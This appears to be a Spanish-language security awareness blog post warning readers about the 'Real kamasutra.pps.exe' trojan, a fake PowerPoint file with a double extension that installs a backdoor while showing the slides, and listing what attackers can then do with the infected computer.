Esta técnica se puede utilizar con todo tipo de archivos, aunque los más usuales son los archivos de imágenes, vídeos y presentaciones.

El ejemplo: Real kamasutra.pps.exe

La presentación Kamasutra contiene un troyano que realiza una infección por puerta trasera (y no es una metáfora). Se conoce por puerta trasera o Backdoor, un mecanismo consistente en instalar una aplicación en un equipo que posteriormente no deje entrar en el mismo sin problemas, o realizar cualquier otro tipo de actuación.

Este malware en concreto espera que estés interesado en una presentación de Microsoft PowerPoint mostrando diferentes posturas sexuales, y se verían tentados de pinchar en la misma. Mientras ves la presentación (ya que la presentación si que se muestra, para evitar levantar sospechas), el troyano (llamado Troj/Bckdr-RFM) se instala en el ordenador en un archivo con el nombre de AdobeUpdater.exe, permitiendo a los crackers el acceso remoto al ordenador.

Una vez que ha conseguido el acceso al equipo, se puede utilizar para:

Enviar spam en tu nombre a cualquiera (tus amigos, conocidos, etc... probablemente lo abran si procede de tu cuenta).
Robar la identidad de los usuarios del equipo.
Espiar sus actividades.
Instalar software publicitario de generación de ingresos.
Lanzar ataques de denegación de servicio.
Reenviarse a todos tus contactos.
Y un larguísimo etcétera

Compartir la página en Facebook

Referencias:

Fuente: Death by PowerPoint? Kamasutra presentation leads to backdoor infection
Te puede interesar: "Virus Koobface: un viejo conocido de Facebook" o "GUSANO-ZOMBIE: Koobface ataca de nuevo." muestran otras técnicas utilizadas para hacer que permitas la ejecución del troyano.
Aunque el caso aquí detallado está algo más elaborado, hay muchos otros que utilizan la técnica del viruh Andalú para la que no existe antivirus posible.
Recuerda que hay una ingente cantidad de puertas traseras, fallos de seguridad, etc... que aún no han sido protegidas, así como infinidad de virus que se van creando a diario que aún no son detectados por algunos antivirus, como se indica en VirusTotal: Un mega-antivirus on-line.